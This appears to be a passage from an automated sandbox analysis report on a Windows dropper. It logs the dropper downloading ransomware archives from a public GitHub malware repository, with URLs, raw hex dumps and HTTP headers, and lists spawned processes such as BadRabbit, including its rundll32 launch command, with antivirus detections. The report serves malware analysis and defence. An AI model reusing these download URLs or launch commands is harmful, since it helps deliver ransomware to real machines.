89 bd 6b 1e 4e 1a 93 a9 66 4a c7 1b 64 1c 7c 5a 34 83 a8 a4 16 3b f2 98 b6 8c 6c 34 9e b3 e5 4a 8d c0 30 66 76 06 a1 de c6 8a
                                                                                                        Data Ascii: ;C|1u:pXPLq[Z6Vnq 'ce-K{})B7<xRjkdxpOZUgWf'G5IG])k]\Pmw`bSin$gQ*[PncH7SIW5eKMrkNfJd|Z4;l4J0fv
                                                                                                        2022-09-29 12:45:08 UTC908INData Raw: 88 29 ac 3a d9 19 67 d4 0b 1e a8 7d 6e 14 f8 37 b8 7b 2e 60 c1 d3 72 89 e8 b3 d6 5d f8 6c b1 4e e9 fe 7e 11 72 ba d7 5b 54 06 96 4a 64 5a 8c 4a ff 2f 49 7d 5f b1 47 3a ea a8 e5 f0 b9 c9 bb b0 70 c2 49 ca 32 4b 10 1d ca c4 40 cd 13 67 3d 21 fe 93 ee c4 75 d5 20 94 e3 f2 6a 46 ab 6a 21 70 32 7e bb 67 68 8c bd 59 b5 bc ab d0 e6 9c 37 46 33 96 2f 0e ef a2 67 ee 4a 4d 6b 42 75 cc 1d f8 01 2d 25 c1 7e 37 a5 fa bc e0 80 0c 08 6a a9 13 2a 33 1c f0 4d 34 00 36 be 77 af 93 db 9f 92 4e d5 96 10 47 47 8a 98 cd ce 35 15 f6 41 1c f3 2d 42 fc 84 b1 ba f7 8f 43 8c fa eb 0d 63 0a d0 55 56 73 2a 43 31 fc d1 38 33 9e 58 43 7b 23 1d 01 48 ce c6 85 65 56 07 cd 3c 27 8f 2a 31 3d 1b 9f 4b 2b 42 4d a0 40 8a 73 c7 21 d6 7c a1 ad 87 51 c4 41 f0 be 7b 87 36 42 8d 7c 9c 96 23 de dd
                                                                                                        Data Ascii: ):g}n7{.`r]lN~r[TJdZJ/I}_G:pI2K@g=!u jFj!p2~ghY7F3/gJMkBu-%~7j*3M46wNGG5A-BCcUVs*C183XC{#HeV<'*1=K+BM@s!|QA{6B|#


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        8192.168.2.449715140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2022-09-29 12:45:11 UTC911OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/Fantom.zip HTTP/1.1
                                                                                                        Host: github.com
                                                                                                        2022-09-29 12:45:11 UTC912INHTTP/1.1 302 Found
                                                                                                        Server: GitHub.com
                                                                                                        Date: Thu, 29 Sep 2022 12:44:21 GMT
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                        Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                        Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Fantom.zip
                                                                                                        Cache-Control: no-cache
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                        X-Frame-Options: deny
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 0
                                                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                                                        Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                        2022-09-29 12:45:11 UTC912INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                        Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        9192.168.2.449716185.199.110.133443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2022-09-29 12:45:11 UTC914OUTGET /Endermanch/MalwareDatabase/master/ransomwares/Fantom.zip HTTP/1.1
                                                                                                        Host: raw.githubusercontent.com
                                                                                                        2022-09-29 12:45:11 UTC914INHTTP/1.1 200 OK
                                                                                                        Connection: close
                                                                                                        Content-Length: 203087
                                                                                                        Cache-Control: max-age=300
                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                        Content-Type: application/zip
                                                                                                        ETag: "0f6cd0c854741d82e79b6fae3ecfc41f9b92740bab354e2ee252955917725cf0"
                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-Frame-Options: deny
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        X-GitHub-Request-Id: 0846:E4BC:5E09CA:68A9EF:63359324
                                                                                                        Accept-Ranges: bytes
                                                                                                        Date: Thu, 29 Sep 2022 12:45:11 GMT
                                                                                                        Via: 1.1 varnish
                                                                                                        X-Served-By: cache-mxp6928-MXP
                                                                                                        X-Cache: HIT
                                                                                                        X-Cache-Hits: 1
                                                                                                        X-Timer: S1664455512.888747,VS0,VE1
                                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        X-Fastly-Request-ID: 1f231dff54cce75c302c235836d80d4e1b36216e
                                                                                                        Expires: Thu, 29 Sep 2022 12:50:11 GMT
                                                                                                        Source-Age: 52
                                                                                                        2022-09-29 12:45:11 UTC915INData Raw: 50 4b 03 04 14 00 01 00 08 00 64 01 cd 4c 5a 74 a2 37 b5 18 03 00 00 16 04 00 0a 00 00 00 46 61 6e 74 6f 6d 2e 65 78 65 22 e7 f0 5b 88 6d 31 c8 1f 0b 7d 88 55 e3 33 f2 2a 91 e5 3a 5c 0e c4 5d 37 ee df 6e 5b a7 3d 5a a3 07 6d 88 45 a4 dc 8e 0a a0 0d 92 93 68 24 00 5c 40 19 4d 80 d5 9b c0 88 7e f4 e8 b1 12 2b e0 d8 eb 5f 40 26 3d 64 73 cf d8 7a 1d c8 74 62 56 d5 b5 6b bc c5 66 0c a3 c2 21 35 45 5c c6 a6 10 d6 9a 5f 61 cd b8 bd e2 41 ee 82 d1 88 dd bf 72 be cc b3 c5 72 36 49 19 d7 76 d2 2d 53 e4 de 95 e6 c9 b4 f0 49 f6 d6 ba f6 d0 5f a3 e9 83 90 3f 14 c4 e8 e9 a9 62 03 42 67 dc d3 0d 07 9f 7e 98 1e 50 4b b2 7a 2c 80 44 b5 9f 42 81 88 d5 88 42 ab ab 3c d2 27 98 7c df c6 d3 8e 82 7a 18 17 a0 bc c6 4a cf 60 40 eb 61 1b d0 ed 8e 15 2f 5e 30 68 c8 39 9a 73 d2 34
                                                                                                        Data Ascii: PKdLZt7Fantom.exe"[m1}U3*:\]7n[=ZmEh$\@M~+_@&=dsztbVkf!5E\_aArr6Iv-SI_?bBg~PKz,DBB<'|zJ`@a/^0h9s4
                                                                                                        2022-09-29 12:45:11 UTC931INData Raw: a2 90 f1 46 bd fa 58 76 14 cd 39 d7 85 92 02 85 20 c3 a5 98 83 22 ac 3c b8 93 ee 3f 06 5b 64 5f b0 0c eb e1 e3 a5 a6 2b 68 80 fb 5b 2f 0f 95 bb 70 e3 1d 8e 28 9b 78 6c ba 2d 60 71 44 86 6f 76 07 25 d1 ef eb 8c 2b 1d 4c c0 53 c8 17 82 29 49 06 eb c6 5d 2e 98 11 c9 d8 bc 0d 27 9a a0 13 b1 2a 77 e5 ae 3f 34 60 eb 84 cb fd 7b cd 9f 8c e6 3f 35 1d fc 80 ba ad 47 35 df 12 2b d5 d6 9b 0f d0 ba fd 51 2f 9a 54 d6 cc 3b 75 51 07 c2 4a 7f a1 b2 0a de da a0 b8 20 8f 36 4d 04 24 18 df 1f f0 d6 91 ee 78 45 5c e7 a1 17 e6 c1 bc 2f 3d 69 11 d8 2e fa 97 c2 c9 23 fb dd a1 75 52 9a fc bf 3d c5 a7 a1 74 56 d5 13 99 ec 6e 2d 44 fd a4 f8 9b 4a a1 ab 49 52 84 a0 09 01 cf 73 86 ef fb e7 17 2c b0 2f 55 4d 2e 15 ff 85 43 f4 16 6d 79 9b 3d 8a e5 3d 9e 75 7e 90 f8 0f 0e 8c f1 ac 61
                                                                                                        Data Ascii: FXv9 "<?[d_+h[/p(xl-`qDov%+LS)I].'*w?4`{?5G5+Q/T;uQJ 6M$xE\/=i.#uR=tVn-DJIRs,/UM.Cmy==u~a
                                                                                                        2022-09-29 12:45:11 UTC947INData Raw: 36 e4 b1 70 fd 30 bb 38 60 29 ff 0a 44 f9 e2 73 29 69 fb 52 3d ce da a5 e8 4c c0 f8 99 bd 9e 00 33 88 da b4 e2 01 07 5f de 97 88 36 37 86 35 bb 23 1f 45 31 0c 13 a1 2c 43 ec 79 4f d1 f9 4f ba 28 af 31 aa d6 c4 5b d4 62 dd 91 ed cc ff cd 8b 23 77 90 b4 9b b3 5a 2e c7 43 d1 2b b5 89 27 65 53 29 22 8f 00 36 0e a2 b0 5f 07 43 4b 16 8c 64 7a 49 d7 a5 17 89 89 cc 3f 61 f9 3a a9 cd 0a b0 4d ca c3 ad b5 f6 fd d0 18 08 85 c3 24 b2 29 bd 0d 73 1f 82 38 04 50 3e f3 a8 56 e9 ba 13 85 d3 3a a2 09 a8 b8 4c a3 16 be 50 b7 17 dc 34 b3 39 b0 61 b4 f2 ca cf fa 88 64 02 5e 36 7b f4 32 f7 02 93 5d 35 d7 35 74 36 2d 73 28 4c 2d 44 ec 80 0c 76 23 85 47 15 67 0a a7 6e 78 62 62 2e 0f fa 9e af de 4f 81 bb 14 f9 50 0e 98 d9 a8 54 2c 41 35 ad a5 70 54 f0 34 51 cc 3c 48 1f 2f 68 3d
                                                                                                        Data Ascii: 6p08`)Ds)iR=L3_675#E1,CyOO(1[b#wZ.C+'eS)"6_CKdzI?a:M$)s8P>V:LP49ad^6{2]55t6-s(L-Dv#Ggnxbb.OPT,A5pT4Q<H/h=
                                                                                                        2022-09-29 12:45:11 UTC963INData Raw: f7 ca 9f 68 9f 77 7a 4b b6 b8 bd 7a 98 56 4a b2 f5 fb 1b e3 6c 6c 54 3e 51 a7 92 47 0d e8 be dc 62 0d c9 14 fe 99 95 d5 2b ec da f5 08 0c 37 f2 bc 15 93 91 91 06 51 54 86 7c fa db 9c 66 45 3f 23 ec 33 7b b5 25 75 f8 f4 f8 3a 9d 91 88 90 9c 39 b5 16 e3 ce 06 76 64 23 08 a3 25 d2 c7 df 88 68 95 ca 69 a0 12 50 07 d2 6a 73 dc 01 f9 d1 54 b2 4d 12 7c 1d a5 69 ac e1 62 3a 2c 25 d7 b2 cc 23 dd 02 aa 9b d1 7a 02 a1 ea 77 bc ed 0d 7b ad 17 d7 88 63 59 5b 16 cd 41 66 0e 7d b5 56 ce 8e 6e ab 8d fd 0f 82 7e 25 2f 4d a4 53 1e 57 3f b6 f7 19 32 b7 27 43 58 4e 1b d6 ed 40 3d ec 89 fa d6 37 0a 6e 0b d7 1e 49 8f 0a 51 a2 20 67 c5 56 aa 6a cf fc b0 1c 60 d0 43 ab bc a6 d8 d7 83 7a 97 3a 04 74 bc cd 3c 18 c8 70 29 b1 62 fc 0f 2f ef 59 d6 04 28 81 db f5 b2 41 85 2d 3c 5c 9a
                                                                                                        Data Ascii: hwzKzVJllT>QGb+7QT|fE?#3{%u:9vd#%hiPjsTM|ib:,%#zw{cY[Af}Vn~%/MSW?2'CXN@=7nIQ gVj`Cz:t<p)b/Y(A-<\
                                                                                                        2022-09-29 12:45:11 UTC979INData Raw: b3 da c4 0b 4e 18 b8 c8 2b 82 33 11 8e 62 a0 80 88 7d 29 f1 94 3c b8 c5 d7 92 d3 99 4b d6 e8 38 7d f2 69 00 25 b7 79 48 07 f8 66 9e ad dd e8 65 39 74 62 37 4c 40 b6 03 26 55 92 56 40 3c 30 87 bd 26 fd c8 df 72 0b 76 5d e5 d7 14 af 68 25 58 71 1d 10 cd fa 13 01 d6 ad 31 e8 46 43 75 9b 4d cd f8 0f 07 bd 24 89 61 f4 c0 43 a7 b5 66 b4 0c a9 c9 2f 15 a1 c6 3e 76 01 c3 9a 76 48 37 20 5a f9 c3 6f d8 1d 6a 41 b5 b5 7e 5f 68 b3 c9 d5 c9 a3 8e d4 91 b0 2f 22 9e 6c 7f ea a5 94 ff 8d eb 41 68 9f 5d 21 37 e7 99 4e ee 29 04 88 4e 41 7e 7e a3 be 9c 27 7c 5e 5c 9c ba b5 91 03 5f 7c ef be b8 80 fd ae 0a 89 54 23 b9 2d 83 e8 05 88 ed 0d 58 fd 73 31 0b 4a a5 c6 91 9e 71 11 ee bd ec 3c 22 25 78 2d 03 93 b4 ae 20 3b 7c 4d ee 34 c8 b0 be f9 62 79 36 7b 14 ca a6 78 b6 e4 4f f2
                                                                                                        Data Ascii: N+3b})<K8}i%yHfe9tb7L@&UV@<0&rv]h%Xq1FCuM$aCf/>vvH7 ZojA~_h/"lAh]!7N)NA~~'|^\_|T#-Xs1Jq<"%x- ;|M4by6{xO
                                                                                                        2022-09-29 12:45:11 UTC995INData Raw: 61 4e c7 47 9e e5 9b 30 91 54 a4 85 b6 1f 92 57 cf c6 1d 2b 69 88 1d 52 bf 6d 4e 08 53 ef fb 76 d1 2c f2 9c 69 29 d4 7d 53 35 a0 b5 54 b2 6c 3c 50 13 f0 f3 8e 36 ec d1 85 20 82 99 a4 13 16 e8 e7 b0 af 35 80 b2 b5 85 e4 53 5c d2 1f ff 65 d3 19 50 29 d3 33 70 4e 2a 45 60 de 06 be 27 5b 83 76 d0 75 20 cd 41 9b 7b 41 6c a1 52 09 ff 01 97 f1 5e 76 50 54 73 0d 93 c9 49 a0 fd e4 57 3c 42 e8 b8 23 75 a0 69 68 e7 fd eb c5 d4 3b e9 30 f3 eb c8 25 d5 cf 1e 5a 24 77 83 5d d9 16 cf 2d c8 b0 45 ed 9a 4b e2 25 91 17 41 fb 75 98 b2 8c 30 a7 48 3f 25 c9 84 3f a3 54 4a a9 34 d5 7f a5 1b e3 0f c4 e2 a4 e3 07 4d 1b 5f 26 e3 34 c5 8e d2 b0 ba eb 13 dd 71 7e 15 b6 59 0b 74 93 82 fc 1a 98 33 e3 ed 9a 14 85 2b 1d 69 36 fb af 4d b0 11 00 89 bc 2e da fd b3 dc ae 14 9d 5b 6c 42 8c
                                                                                                        Data Ascii: aNG0TW+iRmNSv,i)}S5Tl<P6 5S\eP)3pN*E`'[vu A{AlR^vPTsIW<B#uih;0%Z$w]-EK%Au0H?%?TJ4M_&4q~Yt3+i6M.[lB
                                                                                                        2022-09-29 12:45:11 UTC1011INData Raw: 6e fa b8 b4 61 ca 74 9c a2 d0 e7 18 87 66 65 47 48 4b da f8 bb 2d fd 93 4e 9d b1 f6 39 3e 75 68 5c f7 e5 e8 7d 68 4e 84 11 b9 87 be 6b b1 fb 30 39 11 b2 24 1b 2d c8 38 62 64 d9 4a 31 7a f2 81 66 58 09 7a fb 45 57 de 85 77 3b 1f 87 d3 2e f9 f3 33 f2 95 dd 14 01 bd 82 59 3d 02 2c 11 8b c8 b5 ba b3 fe 58 8b 2b 3c 70 cc ed 19 e4 8b 75 4d 5f 52 a3 82 37 54 bb f6 2d 06 7e 25 ac 5f 2a 34 7f 47 c7 19 0e 06 5d fd 72 2a 62 b2 99 f5 40 8d 5c 43 db 3b 4f 0a bb 28 6f a3 a4 be e7 0b c6 95 c4 88 db 69 a9 a2 68 a7 07 79 ae b4 7d 35 c1 78 3d 09 35 fb 6f de 1f e8 82 c2 8e ab 16 68 82 aa 41 51 92 b9 f3 03 e5 bf 7a 7e 92 9b 3c 6f fb 1e 78 64 41 27 55 c5 e6 32 84 0e d4 94 49 5a 91 88 2b cc 59 f8 34 e4 ec 13 86 3e 84 6a ac 76 52 7a c1 84 b3 68 d8 3d 4b 54 98 3e 19 f3 b3 77 cf
                                                                                                        Data Ascii: natfeGHK-N9>uh\}hNk09$-8bdJ1zfXzEWw;.3Y=,X+<puM_R7T-~%_*4G]r*b@\C;O(oihy}5x=5ohAQz~<oxdA'U2IZ+Y4>jvRzh=KT>w
                                                                                                        2022-09-29 12:45:11 UTC1027INData Raw: 7b 37 ef f6 42 d9 c9 2a 42 ff 02 7d 31 24 af e4 1f 5e 76 23 bf 86 c3 af 69 f7 e9 02 bb a3 85 49 7f 70 26 d4 da e4 4d 70 23 fd 85 9d 1a fc 7a 60 9e 50 e6 74 20 7d fe 68 b1 5f 1e 58 c6 0f 62 31 83 48 ba bb 07 96 47 f0 67 2b ae aa 74 a8 a0 66 60 92 6d c3 70 d6 6b ec 8b 5d 29 00 d0 8a 43 25 b1 49 eb 4d b2 34 26 22 c4 4c a3 e3 63 af f2 b2 22 81 c1 e8 53 0b 89 b8 2b 5e b8 1e 67 4f 27 6e ef 51 c5 bd db 82 a1 b9 82 96 27 a8 d2 31 34 e3 a2 63 1e 23 51 09 77 39 fa 06 d8 d1 33 41 46 e9 93 a0 16 d9 04 5d df 15 d0 13 44 72 2d 18 08 95 25 be c2 e2 4e 7b 4c 8b 9f 4e 49 77 1a 86 8c 7f 63 7c f0 f3 10 0b a4 2a 92 6f 10 46 42 6e 96 e5 56 db e5 c6 33 d4 b3 a0 ac a7 36 a2 8f 8d 44 b0 6b 5c 4a b0 63 73 cf 45 eb af 03 39 06 67 13 7c 5c b6 a1 48 d8 34 97 9e 26 fb 05 48 20 d1 32
                                                                                                        Data Ascii: {7B*B}1$^v#iIp&Mp#z`Pt }h_Xb1HGg+tf`mpk])C%IM4&"Lc"S+^gO'nQ'14c#Qw93AF]Dr-%N{LNIwc|*oFBnV36Dk\JcsE9g|\H4&H 2
                                                                                                        2022-09-29 12:45:11 UTC1043INData Raw: 61 5c 56 85 15 75 56 0d 28 0a a8 3e e5 91 d0 cd 62 be 20 cf f2 27 2a 72 84 76 12 73 55 fa 5d b2 6c 6d 04 58 8f 9c 31 e3 4d a4 aa f3 6b 73 16 0e ba a1 7a 9b 2e 49 81 ea ce ec 58 7b 88 cb f6 98 43 b5 75 54 e0 2d 1d 64 f8 f6 50 4b 2f f9 fc 59 be d6 6f 06 f6 6c 80 e2 6c 59 5d 76 bd 01 ca a7 28 7c 39 00 8b 07 ad 9e 72 09 f2 e2 fa af c7 fa 86 cc 37 a1 72 aa 8d f9 19 d3 9b 89 39 5a c8 dc 13 89 2f 0d 47 32 93 35 67 47 17 df 64 76 dc cb 44 0c 72 ce 2f ea 1f 3e a9 19 20 b2 95 f5 39 09 25 f8 90 2d e7 1a 8f f4 4e b5 81 cf fb 88 da cf 4b 4d d8 d3 2a 0b cc 5f e8 91 d1 d4 18 c6 81 bb a1 9a 47 87 9b 1c 3a a4 7c 37 a1 fc 31 7c 3f 50 7d b2 38 57 56 f9 18 81 e5 0c 60 5b 17 62 a0 20 98 4c 51 dc fa 20 32 af 70 9b 80 a5 b0 da 1d 51 ae a8 41 42 43 21 18 81 10 10 cd 3e c4 1c 94
                                                                                                        Data Ascii: a\VuV(>b '*rvsU]lmX1Mksz.IX{CuT-dPK/YollY]v(|9r7r9Z/G25gGdvDr/> 9%-NKM*_G:|71|?P}8WV`[b LQ 2pQABC!>
                                                                                                        2022-09-29 12:45:11 UTC1059INData Raw: 8c fe 89 e4 2b f9 70 2a ff 4e b6 22 b7 de 84 2e 21 f3 4c bd b9 99 07 a1 48 89 9b c1 33 25 01 e2 43 77 35 d2 e6 25 7e be 24 50 ec 49 a7 d6 74 ac e8 20 5b a2 55 45 0b 58 5b 84 bd 06 c6 c0 7a d7 f6 70 8a b9 78 e4 94 35 ee 4f 09 37 4a e7 a9 ba 2c de 19 79 8d 25 1f c8 de 55 7a f7 e5 7a 21 cf e9 f5 34 56 9f e8 db c6 7a e1 54 03 d4 6b 9b 59 03 d7 20 3d 15 b7 74 7a 00 cf 76 4c 46 bf 36 41 7d 56 7b 80 54 7c ef 07 ac 79 5f f9 6d 2b f4 11 d3 25 d0 37 36 0d 5a 5e 54 0e a2 aa ee cc 0e 3f db 50 6a 9e 43 ba 4c 11 e2 83 9f a9 b8 4c 25 aa 7a 60 8b 5c 6e 5e 7c 4a 0b 2f f2 7c 2d 59 e1 28 9a ab 30 10 ed 78 f9 12 02 0d 0d fd f8 e3 df 3b 0b 33 59 54 ed 98 c7 ce a0 bc 83 7d 76 5b 4a 50 5a f2 a9 6d 92 4e be 0f 8e 72 ab fe 7f b3 45 41 58 77 2b 5e 84 6f c8 d8 a5 6d 52 1d 26 10 11
                                                                                                        Data Ascii: +p*N".!LH3%Cw5%~$PIt [UEX[zpx5O7J,y%Uzz!4VzTkY =tzvLF6A}V{T|y_m+%76Z^T?PjCLL%z`\n^|J/|-Y(0x;3YT}v[JPZmNrEAXw+^omR&
                                                                                                        2022-09-29 12:45:11 UTC1075INData Raw: 6b d5 a8 7c 2f 7e 0e 46 3f 5e ce 1f a3 5e 1b e0 6e 4a 8d 5b 57 74 c5 16 e4 e4 aa 20 45 9a 25 86 64 ce 6e bb 65 85 d2 f6 ac d0 e3 54 cf bb b2 80 07 e8 94 28 f1 00 57 b3 a3 a7 9f 07 88 d2 94 90 38 f7 4c 66 af 43 cd f3 64 25 28 73 27 9b 7c be 6f d9 a1 91 a5 ce 8c a8 d3 63 d5 51 40 e3 1a 59 64 1e 9f 40 f1 9d 5d d3 95 61 45 03 f3 c3 3e 0d 6d 2c b0 17 78 7d 39 16 0f 3e b7 16 a5 fa 17 09 44 d8 e9 e1 09 0a 87 ef 9d b2 de 6e 16 74 82 97 ad 08 03 e1 77 bc aa fc 85 d9 bb a4 f7 9f 96 67 e0 22 d1 77 43 14 81 ed 61 8f 13 aa a0 9b e3 4b 0d c4 38 78 ec 8d bf 7f e0 ba 63 37 93 b4 be 1d c2 6c 65 71 e7 a7 8a 10 2b 36 30 46 e2 8d 4a 79 4c 9f 09 a6 d1 bd 89 57 0c 03 d9 de 6b 97 c9 02 48 cf 2d c6 b9 77 c9 d7 6b 52 0c 0a 2f 9b a2 3b 0a 6a 74 96 b7 1a 16 cd 05 d0 5f 3c f9 f1 75
                                                                                                        Data Ascii: k|/~F?^^nJ[Wt E%dneT(W8LfCd%(s'|ocQ@Yd@]aE>m,x}9>Dntwg"wCaK8xc7leq+60FJyLWkH-wkR/;jt_<u
                                                                                                        2022-09-29 12:45:11 UTC1091INData Raw: ee c8 2c b0 ea eb 54 54 19 e5 26 0c 7b 5d 9f 97 86 2e 93 32 e4 35 a7 13 b5 7d c3 72 15 68 c0 31 75 eb e8 e5 a4 1c aa 5e fa c2 9e 0a e7 2e 95 6f 23 5f 5a aa d3 6a 70 11 a3 71 0c be ab af 17 53 cf d7 1b bf 1d 85 f5 51 34 66 32 ed 3a 8c 57 8f bb d3 60 60 21 50 73 c6 d2 12 65 a5 1e 09 2e 32 35 e5 62 70 b9 64 b2 56 95 dc 09 19 87 e6 ad 81 fa 25 98 10 00 8f ce 56 e6 39 c5 c9 3c a9 d4 39 e5 d9 a8 ed f7 d7 2a 12 05 54 f0 12 3e 8e c5 cf d4 06 c3 35 9a 9e b0 12 68 fe 51 76 8a c4 bd bd 13 47 7e 93 0f 6f d3 20 2c bc 3d 09 1f 13 5d 69 12 1c 67 6d 26 99 93 e8 e4 14 e4 12 8f eb d3 d6 76 14 e3 ad 43 81 90 8e f9 87 04 33 83 f6 7d 55 67 f0 ef 5f d1 56 fa d0 39 b6 f5 ec 03 6a 88 c8 29 10 4b 12 a3 dd 66 1b d9 d4 5c 4c 45 12 d7 dc 31 f6 d6 bf 94 29 09 83 59 4d e7 40 0b 94 d6
                                                                                                        Data Ascii: ,TT&{].25}rh1u^.o#_ZjpqSQ4f2:W``!Pse.25bpdV%V9<9*T>5hQvG~o ,=]igm&vC3}Ug_V9j)Kf\LE1)YM@
                                                                                                        2022-09-29 12:45:11 UTC1107INData Raw: 4b 8d cd fe 11 d2 6f 92 44 9c 02 47 4e 1b ed c1 63 0b 57 90 24 e5 3c 9d bc 23 d3 14 4f d5 54 d1 46 82 fb 73 88 b5 ce 15 eb 6f a1 10 b2 a5 a2 98 76 69 d4 e0 33 04 bc e2 ba 44 87 53 fa c6 02 96 ad 7e 25 24 3e 27 ff ac 19 4c cc b4 38 db 57 b7 3f ee 38 92 4c bd 7a 6d e1 37 4f 62 d6 40 0e 9d a9 9e 39 cd b1 22 62 af 22 d5 6a 20 e6 84 10 8d 01 c1 50 f2 a6 e4 fa 0a ec 68 45 63 fe e2 0a c5 17 38 18 8b 13 02 8b 8e e8 84 5a c0 89 0b 2a 67 d2 1f b5 e3 46 1a 9d 98 0f a5 9e 1a 56 c6 17 a1 7a 1c a2 04 75 41 23 59 ff cc 07 bc 2f 4e 74 7e 7a 01 98 a2 4a 15 b9 ab 74 ff c6 60 2e 26 50 5e 78 62 0f 83 0d a4 fd 1f fe e3 e1 4e 53 e1 87 44 b0 b0 86 d8 d4 3b 91 9e a7 cc 3a 27 54 b6 bd 57 d0 96 05 06 aa 46 fe 7f 8b 73 05 d2 ba 7d 65 77 ca ae c7 35 8b 1b 83 99 15 36 bf 18 26 ec 95
                                                                                                        Data Ascii: KoDGNcW$<#OTFsovi3DS~%$>'L8W?8Lzm7Ob@9"b"j PhEc8Z*gFVzuA#Y/Nt~zJt`.&P^xbNSD;:'TWFs}ew56&


                                                                                                        Click to jump to process

                                                                                                        Click to jump to process

                                                                                                        Click to dive into process behavior distribution

                                                                                                        Click to jump to process

                                                                                                        Target ID:0
                                                                                                        Start time:14:44:54
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Users\user\Desktop\4W5dQXszUV.exe"
                                                                                                        Imagebase:0x20a36b50000
                                                                                                        File size:152064 bytes
                                                                                                        MD5 hash:6ED3E3327246CC457D22BB92BD3BBA8B
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                        Reputation:low

                                                                                                        Target ID:1
                                                                                                        Start time:14:45:04
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Users\user\AppData\Local\Temp\sh0cbz1h.c1l\Endermanch@BadRabbit.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\sh0cbz1h.c1l\Endermanch@BadRabbit.exe"
                                                                                                        Imagebase:0x880000
                                                                                                        File size:441899 bytes
                                                                                                        MD5 hash:FBBDC39AF1139AEBBA4DA004475E8839
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: BadRabbit_Gen, Description: Detects BadRabbit Ransomware, Source: C:\Users\user\AppData\Local\Temp\sh0cbz1h.c1l\Endermanch@BadRabbit.exe, Author: Florian Roth
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 93%, ReversingLabs
                                                                                                        • Detection: 83%, Metadefender, Browse
                                                                                                        Reputation:low

                                                                                                        Target ID:2
                                                                                                        Start time:14:45:04
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff7c72c0000
                                                                                                        File size:625664 bytes
                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high

                                                                                                        Target ID:3
                                                                                                        Start time:14:45:04
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exe"
                                                                                                        Imagebase:0x400000
                                                                                                        File size:119296 bytes
                                                                                                        MD5 hash:41789C704A0EECFDD0048B4B4193E752
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:Borland Delphi
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 86%, ReversingLabs
                                                                                                        • Detection: 78%, Metadefender, Browse
                                                                                                        Reputation:low

                                                                                                        Target ID:4
                                                                                                        Start time:14:45:04
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
                                                                                                        Imagebase:0x10b0000
                                                                                                        File size:61952 bytes
